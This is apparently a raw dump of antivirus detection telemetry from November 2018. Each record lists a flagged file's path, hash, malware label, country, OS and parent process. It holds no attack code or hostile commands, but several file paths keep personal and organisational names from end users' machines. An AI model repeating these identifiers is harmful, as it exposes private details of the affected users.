  Row(detection=Row(filename='9c636a10e4ff6377bce3ab9c5fa120a138d4a4201de5d3e323f650b1a2029226', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\9C636A10E4FF6377BCE3AB9C5FA120A138D4A4201DE5D3E323F650B1A2029226', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9c636a10e4ff6377bce3ab9c5fa120a138d4a4201de5d3e323f650b1a2029226', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9b3b7a8b2387190551bc8d83e0a35b0cedde9af14b66cb228cf57f9cdc0e9f1f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\9B3B7A8B2387190551BC8D83E0A35B0CEDDE9AF14B66CB228CF57F9CDC0E9F1F', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9b3b7a8b2387190551bc8d83e0a35b0cedde9af14b66cb228cf57f9cdc0e9f1f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\5hkewv2tgde\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpl4pv_tiu', filepath='/tmp/tmpl4pv_tiu', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='US', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T02:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ee11549bcf761bbdcd2b2101b64d78b9f4c5ba33c930bc207a3bd9795b2ee67d', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\EE11549BCF761BBDCD2B2101B64D78B9F4C5BA33C930BC207A3BD9795B2EE67D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ee11549bcf761bbdcd2b2101b64d78b9f4c5ba33c930bc207a3bd9795b2ee67d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:37:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='689342.exe', filepath='D:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T14:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222053-900505d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222053-900505D6', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\c:\\program files (x86)\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:22:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gmasjidul haram.exe', filepath='d:\\al quran\\quran tafssir in pashto\\gMasjidul Haram.exe', filesize=1792000, name='TR/Patched.Gen.#M300.#R3369'), hash='ccf521520ebef7060baa9ea194a6d9f01f3794db19af1d6846373348a2001799', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:53:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130113-020b782a', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-125733-6ABDF566\\AVSCAN-20181104-130113-020B782A', filesize=600000, name='HEUR/APC.#M1.#R1'), hash='c01494cfee8fb222b05b7269f85a0008d16c893f6e63ae84ba3de83f4aa9f3c0', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029085f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029085f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:35:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='goopdate.dll', filepath='C:\\Program Files (x86)\\Drabocultthhery\\goopdate.dll', filesize=128000, name='HEUR/AGEN.1030700.#M1.#R1'), hash='fd567a86a4cea46633d46a281c2792828d02e240ce8eebd3bc67fa45d8a22298', metadata=Row(cmdline='d5f2eb1c-2bb5-4525-939c-cca8415767f4', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Drabocultthhery\\nahit.exe', parentsize=680584, timestamp='2018-11-04T10:53:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150645-d529640b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150645-D529640B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238b23', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238b23', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:29:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='de8f5b055b95c51ceb5210b1c4f8bb6b6e6fdf2978072b4659ec0e21ea05b217', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:07:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='/Volumes/My Passport Pro/Samart/DATA1_iMAC/Documents/Samart/WasuwatP/IT_Support/SSW/Ake_Service/Resource/Driver Genius Pro v8.0.0.316/Lang.rus Key/keygen/keygen.exe', filesize=128000, name='HEUR/AGEN.1028107.#M15.#R1028107'), hash='d3fc50040071f41f3e5754c1745ac786b7ebb78b83e9ed08642630666e86cee4', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204658-8361b133', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204658-8361B133', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a136', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a136', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:53:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B81D81CC96BFCFCAADC71383F3141EBD88EB449EB08D4173E94514D4EE30F2A0', filesize=896000, name='TR/Kryptik.cqkbr.#M1.#R1'), hash='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:48:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='snare.dll', filepath='C:\\AdwCleaner\\quarantine\\files\\ovzxddwiyijpegnfihakzutfrdahurhb\\Snare.dll', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T08:01:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082313-13650c3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_907857d7\\AVSCAN-20181104-082301-10DC6682\\AVSCAN-20181104-082313-13650C3B', filesize=64000, name='TR/KillAll.zxrko.#M1.#R1'), hash='f7a90a048a56ad18b6598812df82e3490bc063fbbbcf2ab99d21af2f31d345c8', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:23:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ecb2ff9ccfcb5b12794736ce29a327ec267608beb43fa7fe13780764a4ba3912', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\ECB2FF9CCFCB5B12794736CE29A327EC267608BEB43FA7FE13780764A4BA3912', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ecb2ff9ccfcb5b12794736ce29a327ec267608beb43fa7fe13780764a4ba3912', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:32:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='G:\\RAID数据恢复\\c\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T09:26:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\_cdres\\_exe\\Install Navigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='fe57d2435a26d4a86188dc8b7caf402d0cbbdc584abfc6bfea36e7de89e4c172', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:09Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-155752-df65cc78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155752-DF65CC78', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bfb82410', filepath='C:\\Users\\X\\Desktop\\BFB82410', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='119f96ae1a8598d250986a9b2fdd7618d1b9dbd26628185f69fac0ae59ced889', metadata=Row(cmdline='\\\\\\/dde', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE', parentsize=32902304, timestamp='2018-11-02T06:26:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD5725-D41B-FA55-3028-3863E6DB5FB1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Dark Light Client 1.8\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='600d63c03b1447756de18eb1fb6e95c4b31af78b082567001416de20d838e3ad', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:37:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultracas.exe', filepath='\\\\?\\C:\\DATA\\INST\\ZIP\\UltraCAS\\UltraCAS.exe', filesize=64000, name='HEUR/APC.Griffin.#M1.#R1'), hash='447451e81ed5153a5597e8dd9f914ff2ff34977c4abe7bddd2f99905c6272685', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:57:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/CoinMiner.CW.#M1.#R1'), hash='6aee240dfea62ae0faa6b60867f34b25450b3f8d09ad924f6993d7252f897862', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T06:46:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='standard_items.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Standard_Items\\Standard_Items.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C3BEDF1D1214363AC3582E2DF3F1E5E592BA8636E8480767D90BE1867AD6D1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1f06e353466caf56f94fcd51601058b7064dd9dca386e84e4636a7e8a661078f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2640896, timestamp='2018-11-02T13:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150040-e59866da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150040-E59866DA', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-031315-8edd8124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90d0e788\\AVSCAN-20181102-031235-87922089\\AVSCAN-20181102-031315-8EDD8124', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='626596cbba33ca077633c742d15edb9bd1be3ad602c74aa84d3634b6556b0f8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1dadf2f6c363147e08ef2895c70a4861fb47b9823de978a0f007a04e8c136994', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155746-debe612e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155746-DEBE612E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videoconvert-ttab02-a74bec0684c08ff3beb5e8ebd351d67c.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\VideoConvert-TTAB02-A74BEC0684C08FF3BEB5E8EBD351D67C.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-02T04:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T16:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T23:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:46Z'), dt=datetime.date(2018, 11, 2)),
